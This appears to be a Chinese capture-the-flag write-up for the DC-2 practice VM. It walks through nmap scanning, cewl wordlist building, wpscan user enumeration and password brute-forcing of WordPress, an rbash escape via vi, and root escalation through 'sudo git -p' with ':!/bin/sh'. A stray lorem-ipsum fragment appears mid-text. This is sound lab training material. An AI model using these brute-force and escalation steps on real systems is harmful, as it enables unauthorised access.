目录
注:本文涉及到的一些知识都在下载后的dc-2.md文件中,文章不逐一讲解,或者私信
下载
链接:https://pan.baidu.com/s/1DJVYxhyoetIEAhyDtYikpg
提取码:i53s
.ova文件导入,.md文件为涉及到的一些知识
开始
注意靶场网络配置与kali相同,启动靶机
查看kali的IP
使用nmap找到靶机ip,然后进行端口详细扫描
发现开启了80端口,还有一个可能将22端口改为7744的ssh服务,还发现网页进行了重定向
hosts文件进行修改
vi /etc/hosts //修改hosts文件
访问IP192.168.80.130,提示为wordpress的框架
提示使用cewl网页抓取,并说可能使用某个特定账户才能登录
cewl抓取
cewl http://dc-2 > pass.txt
使用wpscan进行用户爆破
wpscan --url http://dc-2 -e u
运行wpscan报错Could not find 'nokogiri' (~> 1.8.0) - 码农教程
解决报错问题
爆破出三个用户,将这些用户写入某个文件,当作下来爆破的用户字典
wpscan --url -P passwdspath -U userspath
adipiscing parturient
dirb爆破网页目录
dirb http://dc-2 找到后台用爆破的账号密码登录,发现用jerry用户即可
找到flag2,提示换一种方式,想到之前的ssh
ssh连接
tom登录,得到flag3
看到rbash,了解一些命令被禁用
我们需要查看可用命令 ls /home/tom/usr/bin
vi绕过
vi
:set shell=/bin/sh //给shell赋值
:shell //执行shell
逃逸成功后发现命令还是无法执行
我们查看PATH变量
发现,这是路径的问题,我们需要修改路径
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin
然后就可以进行操作了
flag3提示切换用户,我们切换为jerry
su jerry
再回到主目录,找到flag4,提示git提权
git提权
sudo -l //授权查看,看到git
sudo git -p //因为分页查看才能输入命令,所以将框距调小
:!/bin/sh //shell转义,所以要避免sudo授权用户使用vi,vim,ftp.lee,more,git….
cd /root
ls